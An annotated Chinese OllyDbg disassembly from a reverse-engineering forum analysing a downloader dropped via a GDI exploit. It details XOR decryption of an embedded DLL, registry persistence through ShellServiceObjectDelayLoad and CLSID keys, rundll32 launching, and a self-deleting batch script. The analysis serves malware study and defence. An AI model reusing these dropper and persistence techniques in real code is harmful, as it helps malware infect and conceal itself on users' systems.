【文章标题】一个被Gdi漏洞利用后的下载者分析
【文章作者】KuNgBiM/[CCG]
【注意】断网调试
【工具】OD
原始样本下载:http://bbs.pediy.com/showthread.php?t=73885
00401414 >/$ 55 push ebp ; OEP
00401415 |. 8BEC mov ebp,esp
00401417 |. 6A FF push -1
00401419 |. 68 18224000 push update_.00402218
0040141E |. 68 FC134000 push <jmp.&MSVCRT._except_handler3> ; SE 处理程序安装
00401423 |. 64:A1 00000000 mov eax,dword ptr fs:[0]
00401429 |. 50 push eax
0040142A |. 64:8925 00000000 mov dword ptr fs:[0],esp
00401431 |. 83EC 68 sub esp,68
00401434 |. 53 push ebx
00401435 |. 56 push esi
00401436 |. 57 push edi
00401437 |. 8965 E8 mov [local.6],esp
0040143A |. 33DB xor ebx,ebx
0040143C |. 895D FC mov [local.1],ebx
0040143F |. 6A 02 push 2
00401441 |. FF15 5C204000 call dword ptr ds:[<&MSVCRT.__set_app_type>] ; MSVCRT.__set_app_type
00401447 |. 59 pop ecx
00401448 |. 830D 306E4000 FF or dword ptr ds:[406E30],FFFFFFFF
0040144F |. 830D 346E4000 FF or dword ptr ds:[406E34],FFFFFFFF
00401456 |. FF15 64204000 call dword ptr ds:[<&MSVCRT.__p__fmode>] ; MSVCRT.__p__fmode
0040145C |. 8B0D 2C6E4000 mov ecx,dword ptr ds:[406E2C]
00401462 |. 8908 mov dword ptr ds:[eax],ecx
00401464 |. FF15 98204000 call dword ptr ds:[<&MSVCRT.__p__commode>] ; MSVCRT.__p__commode
0040146A |. 8B0D 286E4000 mov ecx,dword ptr ds:[406E28]
00401470 |. 8908 mov dword ptr ds:[eax],ecx
00401472 |. A1 68204000 mov eax,dword ptr ds:[<&MSVCRT._adjust_fdiv>]
00401477 |. 8B00 mov eax,dword ptr ds:[eax]
00401479 |. A3 386E4000 mov dword ptr ds:[406E38],eax
0040147E |. E8 10010000 call update_.00401593
00401483 |. 391D 186E4000 cmp dword ptr ds:[406E18],ebx
00401489 |. 75 0C jnz short update_.00401497
0040148B |. 68 90154000 push update_.00401590
00401490 |. FF15 6C204000 call dword ptr ds:[<&MSVCRT.__setusermatherr>] ; MSVCRT.__setusermatherr
00401496 |. 59 pop ecx
00401497 |> E8 E2000000 call update_.0040157E
0040149C |. 68 0C304000 push update_.0040300C
004014A1 |. 68 08304000 push update_.00403008
004014A6 |. E8 CD000000 call <jmp.&MSVCRT._initterm>
004014AB |. A1 246E4000 mov eax,dword ptr ds:[406E24]
004014B0 |. 8945 94 mov [local.27],eax
004014B3 |. 8D45 94 lea eax,[local.27]
004014B6 |. 50 push eax
004014B7 |. FF35 206E4000 push dword ptr ds:[406E20]
004014BD |. 8D45 9C lea eax,[local.25]
004014C0 |. 50 push eax
004014C1 |. 8D45 90 lea eax,[local.28]
004014C4 |. 50 push eax
004014C5 |. 8D45 A0 lea eax,[local.24]
004014C8 |. 50 push eax
004014C9 |. FF15 74204000 call dword ptr ds:[<&MSVCRT.__getmainargs>] ; MSVCRT.__getmainargs
004014CF |. 68 04304000 push update_.00403004
004014D4 |. 68 00304000 push update_.00403000
004014D9 |. E8 9A000000 call <jmp.&MSVCRT._initterm>
004014DE |. 83C4 24 add esp,24
004014E1 |. A1 78204000 mov eax,dword ptr ds:[<&MSVCRT._acmdln>]
004014E6 |. 8B30 mov esi,dword ptr ds:[eax]
004014E8 |. 8975 8C mov [local.29],esi
004014EB |. 803E 22 cmp byte ptr ds:[esi],22
004014EE |. 75 3A jnz short update_.0040152A
004014F0 |> 46 /inc esi
004014F1 |. 8975 8C |mov [local.29],esi
004014F4 |. 8A06 |mov al,byte ptr ds:[esi]
004014F6 |. 3AC3 |cmp al,bl
004014F8 |. 74 04 |je short update_.004014FE
004014FA |. 3C 22 |cmp al,22
004014FC |.^ 75 F2 \jnz short update_.004014F0
004014FE |> 803E 22 cmp byte ptr ds:[esi],22
00401501 |. 75 04 jnz short update_.00401507
00401503 |> 46 inc esi
00401504 |. 8975 8C mov [local.29],esi
00401507 |> 8A06 mov al,byte ptr ds:[esi]
00401509 |. 3AC3 cmp al,bl
0040150B |. 74 04 je short update_.00401511
0040150D |. 3C 20 cmp al,20
0040150F |.^ 76 F2 jbe short update_.00401503
00401511 |> 895D D0 mov [local.12],ebx
00401514 |. 8D45 A4 lea eax,[local.23]
00401517 |. 50 push eax ; /pStartupinfo
00401518 |. FF15 38204000 call dword ptr ds:[<&KERNEL32.GetStartupInfoA>] ; \GetStartupInfoA
0040151E |. F645 D0 01 test byte ptr ss:[ebp-30],1
00401522 |. 74 11 je short update_.00401535
00401524 |. 0FB745 D4 movzx eax,word ptr ss:[ebp-2C]
00401528 |. EB 0E jmp short update_.00401538
0040152A |> 803E 20 /cmp byte ptr ds:[esi],20
0040152D |.^ 76 D8 |jbe short update_.00401507
0040152F |. 46 |inc esi
00401530 |. 8975 8C |mov [local.29],esi
00401533 |.^ EB F5 \jmp short update_.0040152A
00401535 |> 6A 0A push 0A
00401537 |. 58 pop eax
00401538 |> 50 push eax ; /Arg4
00401539 |. 56 push esi ; |Arg3
0040153A |. 53 push ebx ; |Arg2
0040153B |. 53 push ebx ; |/pModule
0040153C |. FF15 1C204000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>] ; |\GetModuleHandleA
00401542 |. 50 push eax ; |Arg1
00401543 |. E8 E6FDFFFF call update_.0040132E ; \准备使坏!
{ // call 0040132E
0040132E /$ 55 push ebp ; 调用API函数OpenMutexA创建病毒互斥量__DL_CORE4GAEX_MUTEX__ 防止病毒多次运行
0040132F |. 8BEC mov ebp,esp
00401331 |. 81EC 04010000 sub esp,104
00401337 |. E8 A7FFFFFF call update_.004012E3 ; 启动系统相关服务(跟进可详细查看)
{ // call 004012E3
004012E3 /$ 55 push ebp ; 在ShellServiceObjectDelayLoad键下添加DesktopWin键值
004012E4 |. 8BEC mov ebp,esp
004012E6 |. 51 push ecx
004012E7 |. 8D45 FC lea eax,[local.1]
004012EA |. 50 push eax ; /pHandle
004012EB |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
004012F0 |. 6A 00 push 0 ; |Reserved = 0
004012F2 |. FF35 146E4000 push dword ptr ds:[406E14] ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
004012F8 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
004012FD |. FF15 08204000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA
00401303 |. 85C0 test eax,eax
00401305 |. 75 25 jnz short update_.0040132C
00401307 |. 56 push esi ; 判定注册表项是否存在JavaView键值,如存在则将其删除
00401308 |. 8B35 04204000 mov esi,dword ptr ds:[<&ADVAPI32.RegDeleteValueA>] ; ADVAPI32.RegDeleteValueA
0040130E |. 68 CC214000 push update_.004021CC ; /javaview
00401313 |. FF75 FC push [local.1] ; |hKey
00401316 |. FFD6 call esi ; \RegDeleteValueA
00401318 |. 68 C0214000 push update_.004021C0 ; /desktopwin
0040131D |. FF75 FC push [local.1] ; |hKey
00401320 |. FFD6 call esi ; \RegDeleteValueA
00401322 |. FF75 FC push [local.1] ; /hKey
00401325 |. FF15 0C204000 call dword ptr ds:[<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
0040132B |. 5E pop esi
0040132C |> C9 leave
0040132D \. C3 retn
}
0040133C |. 68 FC214000 push update_.004021FC ; /__dl_core4gaex_mutex__
00401341 |. 6A 00 push 0 ; |Inheritable = FALSE
00401343 |. 6A 01 push 1 ; |Access = 1
00401345 |. FF15 50204000 call dword ptr ds:[<&KERNEL32.OpenMutexA>] ; \OpenMutexA
0040134B |. 85C0 test eax,eax
0040134D |. 0F85 97000000 jnz update_.004013EA
00401353 |. 56 push esi ; 判定是否有此互斥,如有则跳过不释放病毒DLL,如无则继续执行
00401354 |. 68 04010000 push 104 ; /病毒调用API函数GetFileAttributesA,获取目录文件列表
00401359 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
0040135F |. 50 push eax ; |Buffer
00401360 |. FF15 20204000 call dword ptr ds:[<&KERNEL32.GetWindowsDirectoryA>] ; \GetWindowsDirectoryA
00401366 |. 8B35 24204000 mov esi,dword ptr ds:[<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
0040136C |. 68 E4214000 push update_.004021E4 ; /program files\messenger__dl_core4gaex_mutex__
00401371 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
00401377 |. 50 push eax ; |ConcatString
00401378 |. C685 FFFEFFFF 00 mov byte ptr ss:[ebp-101],0 ; |
0040137F |. FFD6 call esi ; \lstrcatA
00401381 |. 8D85 FCFEFFFF lea eax,[local.65]
00401387 |. 50 push eax ; /FileName
00401388 |. FF15 28204000 call dword ptr ds:[<&KERNEL32.GetFileAttributesA>] ; \GetFileAttributesA
0040138E |. 83F8 10 cmp eax,10 ; 是否大于10个,如大于等于10个则跳过不创建AppPatch目录,如小于10则创建此目录
00401391 |. 74 0F je short update_.004013A2
00401393 |. 6A 00 push 0 ; /pSecurity = NULL
00401395 |. 8D85 FCFEFFFF lea eax,[local.65] ; |
0040139B |. 50 push eax ; |Path
0040139C |. FF15 2C204000 call dword ptr ds:[<&KERNEL32.CreateDirectoryA>] ; \CreateDirectoryA
004013A2 |> 68 D8214000 push update_.004021D8 ; 创建文件名称:\msgmr.dll
004013A7 |. 8D85 FCFEFFFF lea eax,[local.65]
004013AD |. 50 push eax
004013AE |. FFD6 call esi
004013B0 |. 8D85 FCFEFFFF lea eax,[local.65]
004013B6 |. 50 push eax
004013B7 |. E8 44FCFFFF call update_.00401000 ; 下载者解密(跟进!)
{ // call 00401000
00401000 $ 6A 10 push 10 ; 解密解密!
00401002 . 68 F0204000 push update_.004020F0
00401007 . E8 9C050000 call update_.004015A8
0040100C . 33F6 xor esi,esi
0040100E . 8975 FC mov dword ptr ss:[ebp-4],esi
00401011 . 8975 E4 mov dword ptr ss:[ebp-1C],esi
00401014 > 817D E4 00090000 cmp dword ptr ss:[ebp-1C],900 ; 运算次数0x900 = 2304次
0040101B . 73 17 jnb short update_.00401034
0040101D . 8B45 E4 mov eax,dword ptr ss:[ebp-1C]
00401020 . 8D80 10304000 lea eax,dword ptr ds:[eax+403010] ; 文件存在地址=00403010
00401026 . 33C9 xor ecx,ecx
00401028 . 8A08 mov cl,byte ptr ds:[eax] ; 取出加密数据准备开始做解密运算
0040102A . 83F1 3A xor ecx,3A ; 简单的异或处理 xor ecx,3A
0040102D . 8808 mov byte ptr ds:[eax],cl ; 解密后的数据存放处
0040102F . FF45 E4 inc dword ptr ss:[ebp-1C] ; [ebp-1C]自加1,取下一个加密位置中的数据
00401032 .^ EB E0 jmp short update_.00401014
00401034 > 56 push esi ; /解密完毕准备合并后释放文件
00401035 . 56 push esi ; |Attributes
00401036 . 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00401038 . 56 push esi ; |pSecurity
00401039 . 56 push esi ; |ShareMode
0040103A . 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
0040103F . FF75 08 push dword ptr ss:[ebp+8] ; |FileName
00401042 . FF15 48204000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
00401048 . 8BF8 mov edi,eax
0040104A . 897D E0 mov dword ptr ss:[ebp-20],edi
0040104D . 83FF FF cmp edi,-1
00401050 . 74 2D je short update_.0040107F
00401052 . 56 push esi ; /pOverlapped
00401053 . 8D45 E4 lea eax,dword ptr ss:[ebp-1C] ; |
00401056 . 50 push eax ; |pBytesWritten
00401057 . 68 003E0000 push 3E00 ; |释放后文件大小:0x3E00 = 15872字节
0040105C . 68 10304000 push update_.00403010 ; |找到内存中要释放文件的偏移地址
00401061 . 57 push edi ; |hFile
00401062 . FF15 4C204000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401068 . 57 push edi ; /hObject
00401069 . FF15 54204000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
0040106F . 834D FC FF or dword ptr ss:[ebp-4],FFFFFFFF
00401073 . 33C0 xor eax,eax
00401075 . 40 inc eax
00401076 . EB 0D jmp short update_.00401085
00401078 . 33C0 xor eax,eax
0040107A . 40 inc eax
0040107B . C3 retn
0040107C . 8B65 E8 mov esp,dword ptr ss:[ebp-18]
0040107F > 834D FC FF or dword ptr ss:[ebp-4],FFFFFFFF
00401083 . 33C0 xor eax,eax
00401085 > E8 59050000 call update_.004015E3
0040108A . C3 retn
}
004013BC |. 59 pop ecx
004013BD |. 8D85 FCFEFFFF lea eax,[local.65] ; 释放文件位置
004013C3 |. 50 push eax ; /String
004013C4 |. FF15 44204000 call dword ptr ds:[<&KERNEL32.lstrlenA>] ; \lstrlenA
004013CA |. 40 inc eax
004013CB |. 50 push eax
004013CC |. 8D85 FCFEFFFF lea eax,[local.65]
004013D2 |. 50 push eax
004013D3 |. E8 B3FCFFFF call update_.0040108B ; 修改系统相关位置(跟进可详细查看)
{ // call 0040108B
0040108B /$ 55 push ebp ; 新增注册表项,创建CLSID值,添加启动项
0040108C |. 8BEC mov ebp,esp
0040108E |. 81EC 40010000 sub esp,140
00401094 |. 56 push esi
00401095 |. 57 push edi
00401096 |. BE 54214000 mov esi,update_.00402154 ; apartment
0040109B |. 8D7D F0 lea edi,[local.4]
0040109E |. A5 movsd
0040109F |. A5 movsd
004010A0 |. 66:A5 movsw
004010A2 |. 6A 09 push 9
004010A4 |. 59 pop ecx
004010A5 |. BE 2C214000 mov esi,update_.0040212C ; {da191de0-aa86-4ed0-4b87-293d48b2ae99}
004010AA |. 8D7D C4 lea edi,[local.15]
004010AD |. F3:A5 rep movsd
004010AF |. 8D45 C4 lea eax,[local.15]
004010B2 |. 50 push eax ; /<%s>
004010B3 |. 66:A5 movsw ; |
004010B5 |. 8D85 C0FEFFFF lea eax,[local.80] ; |
004010BB |. 68 14214000 push update_.00402114 ; |clsid\%s\inprocserver32{da191de0-aa86-4ed0-4b87-293d48b2ae99}
004010C0 |. 50 push eax ; |s
004010C1 |. A4 movsb ; |
004010C2 |. E8 3B030000 call <jmp.&MSVCRT.sprintf> ; \sprintf
004010C7 |. 83C4 0C add esp,0C
004010CA |. 8D45 EC lea eax,[local.5]
004010CD |. 50 push eax ; /pDisposition
004010CE |. 8D45 FC lea eax,[local.1] ; |
004010D1 |. 50 push eax ; |pHandle
004010D2 |. 33FF xor edi,edi ; |
004010D4 |. 57 push edi ; |pSecurity => NULL
004010D5 |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
004010DA |. 57 push edi ; |Options => REG_OPTION_NON_VOLATILE
004010DB |. 57 push edi ; |Class => NULL
004010DC |. 57 push edi ; |Reserved => 0
004010DD |. 8D85 C0FEFFFF lea eax,[local.80] ; |
004010E3 |. 50 push eax ; |Subkey
004010E4 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004010E9 |. FF15 14204000 call dword ptr ds:[<&ADVAPI32.RegCreateKeyExA>] ; \RegCreateKeyExA
004010EF |. 85C0 test eax,eax
004010F1 |. 0F85 83000000 jnz update_.0040117A
004010F7 |. 53 push ebx
004010F8 |. FF75 0C push [arg.2] ; /Length
004010FB |. FF75 08 push [arg.1] ; |Value
004010FE |. 6A 01 push 1 ; |ValueType = REG_SZ
00401100 |. 57 push edi ; |Subkey => NULL
00401101 |. FF75 FC push [local.1] ; |hKey
00401104 |. FF15 10204000 call dword ptr ds:[<&ADVAPI32.RegSetValueA>] ; \(initial cpu selection)
0040110A |. 8B35 44204000 mov esi,dword ptr ds:[<&KERNEL32.lstrlenA>] ; kernel32.lstrlenA
00401110 |. 8D45 F0 lea eax,[local.4]
00401113 |. 50 push eax ; /String
00401114 |. FFD6 call esi ; \lstrlenA
00401116 |. 40 inc eax
00401117 |. 50 push eax ; /BufSize
00401118 |. 8D45 F0 lea eax,[local.4] ; |
0040111B |. 50 push eax ; |Buffer
0040111C |. 6A 01 push 1 ; |ValueType = REG_SZ
0040111E |. 57 push edi ; |Reserved => 0
0040111F |. 8B3D 00204000 mov edi,dword ptr ds:[<&ADVAPI32.RegSetValueExA>] ; |ADVAPI32.RegSetValueExA
00401125 |. 68 04214000 push update_.00402104 ; |threadingmodel
0040112A |. FF75 FC push [local.1] ; |hKey
0040112D |. FFD7 call edi ; \RegSetValueExA
0040112F |. FF75 FC push [local.1] ; /hKey
00401132 |. 8B1D 0C204000 mov ebx,dword ptr ds:[<&ADVAPI32.RegCloseKey>] ; |ADVAPI32.RegCloseKey
00401138 |. FFD3 call ebx ; \RegCloseKey
0040113A |. 8D45 FC lea eax,[local.1]
0040113D |. 50 push eax ; /pHandle
0040113E |. 68 3F000F00 push 0F003F ; |Access = KEY_ALL_ACCESS
00401143 |. 6A 00 push 0 ; |Reserved = 0
00401145 |. FF35 146E4000 push dword ptr ds:[406E14] ; |Subkey = "Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad"
0040114B |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401150 |. FF15 08204000 call dword ptr ds:[<&ADVAPI32.RegOpenKeyExA>] ; \RegOpenKeyExA
00401156 |. 85C0 test eax,eax
00401158 |. 75 1F jnz short update_.00401179
0040115A |. 8D45 C4 lea eax,[local.15] ; 当系统启动时利用msnmsg.exe进程自动加载病毒组件
0040115D |. 50 push eax ; /String
0040115E |. FFD6 call esi ; \lstrlenA
00401160 |. 40 inc eax ; 获取msn的位置
00401161 |. 50 push eax ; /BufSize
00401162 |. 8D45 C4 lea eax,[local.15] ; |
00401165 |. 50 push eax ; |Buffer
00401166 |. 6A 01 push 1 ; |ValueType = REG_SZ
00401168 |. 6A 00 push 0 ; |Reserved = 0
0040116A |. 68 FC204000 push update_.004020FC ; |msnmsg
0040116F |. FF75 FC push [local.1] ; |hKey
00401172 |. FFD7 call edi ; \RegSetValueExA
00401174 |. FF75 FC push [local.1] ; /hKey
00401177 |. FFD3 call ebx ; \RegCloseKey
00401179 |> 5B pop ebx
0040117A |> 5F pop edi
0040117B |. 5E pop esi
0040117C |. C9 leave
0040117D \. C3 retn
}
004013D8 |. 8D85 FCFEFFFF lea eax,[local.65]
004013DE |. 50 push eax
004013DF |. E8 AAFEFFFF call update_.0040128E ; 自动加载病毒组件(跟进可详细查看)
{ // call 0040128E
0040128E /$ 55 push ebp ; 系统启动时利用Explorer.exe进程自动加载病毒组件
0040128F |. 8BEC mov ebp,esp ; 以命令行方式调用rundll32 "%s",UIMessage,由rundll32.exe创建
00401291 |. 81EC 54040000 sub esp,454
00401297 |. 56 push esi
00401298 |. 8D45 BC lea eax,[local.17]
0040129B |. 50 push eax ; /pStartupinfo
0040129C |. FF15 38204000 call dword ptr ds:[<&KERNEL32.GetStartupInfoA>] ; \GetStartupInfoA
004012A2 |. FF75 08 push [arg.1] ; /<%s>
004012A5 |. 804D E8 81 or byte ptr ss:[ebp-18],81 ; |
004012A9 |. 8D85 ACFBFFFF lea eax,[local.277] ; |
004012AF |. 68 A8214000 push update_.004021A8 ; |rundll32 "%s",uimessagedesktopwin
004012B4 |. 33F6 xor esi,esi ; |
004012B6 |. 50 push eax ; |s
004012B7 |. 66:8975 EC mov word ptr ss:[ebp-14],si ; |
004012BB |. FF15 A0204000 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
004012C1 |. 83C4 0C add esp,0C
004012C4 |. 8D45 AC lea eax,[local.21]
004012C7 |. 50 push eax ; /pProcessInfo
004012C8 |. 8D45 BC lea eax,[local.17] ; |
004012CB |. 50 push eax ; |pStartupInfo
004012CC |. 56 push esi ; |CurrentDir => NULL
004012CD |. 56 push esi ; |pEnvironment => NULL
004012CE |. 56 push esi ; |CreationFlags => 0
004012CF |. 56 push esi ; |InheritHandles => FALSE
004012D0 |. 56 push esi ; |pThreadSecurity => NULL
004012D1 |. 56 push esi ; |pProcessSecurity => NULL
004012D2 |. 8D85 ACFBFFFF lea eax,[local.277] ; |
004012D8 |. 50 push eax ; |CommandLine
004012D9 |. 56 push esi ; |ModuleFileName => NULL
004012DA |. FF15 3C204000 call dword ptr ds:[<&KERNEL32.CreateProcessA>] ; \CreateProcessA
004012E0 |. 5E pop esi
004012E1 |. C9 leave
004012E2 \. C3 retn
}
004013E4 |. 83C4 0C add esp,0C
004013E7 |. 5E pop esi
004013E8 |. EB 07 jmp short update_.004013F1
004013EA |> 50 push eax ; /hObject
004013EB |. FF15 54204000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
004013F1 |> E8 88FDFFFF call update_.0040117E ; 获取系统目录创建BAT批处理文件(跟进可详细查看)
{ // call 0040117E
0040117E /$ 55 push ebp ; 病毒运行后调用批处理实现自宫 ^_^
0040117F |. 8BEC mov ebp,esp
00401181 |. 81EC 6C050000 sub esp,56C
00401187 |. 56 push esi
00401188 |. 57 push edi
00401189 |. BF 04010000 mov edi,104
0040118E |. 57 push edi ; /BufSize => 104 (260.)
0040118F |. 8D85 A0FDFFFF lea eax,[local.152] ; |
00401195 |. 50 push eax ; |PathBuffer
00401196 |. 33F6 xor esi,esi ; |
00401198 |. 56 push esi ; |hModule => NULL
00401199 |. FF15 30204000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>] ; \GetModuleFileNameA
0040119F |. 57 push edi ; /BufSize => 104 (260.)
004011A0 |. 8D85 9CFCFFFF lea eax,[local.217] ; |
004011A6 |. 50 push eax ; |Buffer
004011A7 |. FF15 34204000 call dword ptr ds:[<&KERNEL32.GetSystemDirectoryA>] ; \GetSystemDirectoryA
004011AD |. 68 9C214000 push update_.0040219C ; /unxxx.bat
004011B2 |. 8D85 9CFCFFFF lea eax,[local.217] ; |
004011B8 |. 50 push eax ; |<%s>
004011B9 |. 8D85 A4FEFFFF lea eax,[local.87] ; |
004011BF |. 68 94214000 push update_.00402194 ; |%s\%s
004011C4 |. 50 push eax ; |s
004011C5 |. E8 38020000 call <jmp.&MSVCRT.sprintf> ; \sprintf
004011CA |. 83C4 10 add esp,10
004011CD |. 56 push esi ; /hTemplateFile => NULL
004011CE |. 68 80000000 push 80 ; |Attributes = NORMAL
004011D3 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
004011D5 |. 56 push esi ; |pSecurity => NULL
004011D6 |. 6A 02 push 2 ; |ShareMode = FILE_SHARE_WRITE
004011D8 |. 68 00000040 push 40000000 ; |Access = GENERIC_WRITE
004011DD |. 8D85 A4FEFFFF lea eax,[local.87] ; |
004011E3 |. 50 push eax ; |FileName
004011E4 |. FF15 48204000 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; \CreateFileA
004011EA |. 8BF8 mov edi,eax
004011EC |. 83FF FF cmp edi,-1
004011EF |. 0F84 93000000 je update_.00401288
004011F5 |. 68 08020000 push 208 ; /n = 208 (520.)
004011FA |. 8D85 94FAFFFF lea eax,[local.347] ; |
00401200 |. 56 push esi ; |c => 00
00401201 |. 50 push eax ; |s
00401202 |. E8 07020000 call <jmp.&MSVCRT.memset> ; \memset
00401207 |. 8D85 A4FEFFFF lea eax,[local.87]
0040120D |. 50 push eax ; /<%s>
0040120E |. 8D85 A0FDFFFF lea eax,[local.152] ; |
00401214 |. 50 push eax ; |<%s>
00401215 |. 50 push eax ; |<%s>
00401216 |. 8D85 94FAFFFF lea eax,[local.347] ; |
0040121C |. 68 60214000 push update_.00402160 ; |:pp\n\ndel "%s"\n\nif exist "%s" goto pp\n\ndel "%s"\n\n
00401221 |. 50 push eax ; |s
00401222 |. E8 DB010000 call <jmp.&MSVCRT.sprintf> ; \sprintf
00401227 |. 83C4 20 add esp,20
0040122A |. 56 push esi
0040122B |. 8D45 FC lea eax,[local.1]
0040122E |. 50 push eax
0040122F |. 8D85 94FAFFFF lea eax,[local.347]
00401235 |. 50 push eax ; /s
00401236 |. E8 CD010000 call <jmp.&MSVCRT.strlen> ; \strlen
0040123B |. 59 pop ecx ; |
0040123C |. 40 inc eax ; |
0040123D |. 50 push eax ; |nBytesToWrite
0040123E |. 8D85 94FAFFFF lea eax,[local.347] ; |
00401244 |. 50 push eax ; |Buffer
00401245 |. 57 push edi ; |hFile
00401246 |. FF15 4C204000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
0040124C |. 57 push edi ; /hObject
0040124D |. FF15 54204000 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
00401253 |. 8D45 B8 lea eax,[local.18]
00401256 |. 50 push eax ; /pStartupinfo
00401257 |. FF15 38204000 call dword ptr ds:[<&KERNEL32.GetStartupInfoA>] ; \GetStartupInfoA
0040125D |. 804D E4 81 or byte ptr ss:[ebp-1C],81
00401261 |. 8D45 A8 lea eax,[local.22]
00401264 |. 50 push eax ; /pProcessInfo
00401265 |. 8D45 B8 lea eax,[local.18] ; |
00401268 |. 50 push eax ; |pStartupInfo
00401269 |. 56 push esi ; |CurrentDir => NULL
0040126A |. 56 push esi ; |pEnvironment => NULL
0040126B |. 56 push esi ; |CreationFlags => 0
0040126C |. 56 push esi ; |InheritHandles => FALSE
0040126D |. 56 push esi ; |pThreadSecurity => NULL
0040126E |. 56 push esi ; |pProcessSecurity => NULL
0040126F |. 56 push esi ; |CommandLine => NULL
00401270 |. 8D85 A4FEFFFF lea eax,[local.87] ; |
00401276 |. 50 push eax ; |ModuleFileName
00401277 |. 66:8975 E8 mov word ptr ss:[ebp-18],si ; |
0040127B |. FF15 3C204000 call dword ptr ds:[<&KERNEL32.CreateProcessA>] ; \CreateProcessA
00401281 |. 56 push esi ; /ExitCode => 0
00401282 |. FF15 40204000 call dword ptr ds:[<&KERNEL32.ExitProcess>] ; \ExitProcess
00401288 |> 5F pop edi
00401289 |. 33C0 xor eax,eax
0040128B |. 5E pop esi
0040128C |. C9 leave
0040128D \. C3 retn
}
004013F6 |. 33C0 xor eax,eax
004013F8 |. C9 leave
004013F9 \. C2 1000 retn 10
}
00401548 |. 8945 98 mov [local.26],eax
0040154B |. 50 push eax ; /status
0040154C |. FF15 7C204000 call dword ptr ds:[<&MSVCRT.exit>] ; \exit
00401552 |. 8B45 EC mov eax,[local.5]
00401555 |. 8B08 mov ecx,dword ptr ds:[eax]
00401557 |. 8B09 mov ecx,dword ptr ds:[ecx]
00401559 |. 894D 88 mov [local.30],ecx
0040155C |. 50 push eax
0040155D |. 51 push ecx
0040155E |. E8 0F000000 call <jmp.&MSVCRT._XcptFilter>
00401563 |. 59 pop ecx
00401564 |. 59 pop ecx
00401565 \. C3 retn
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课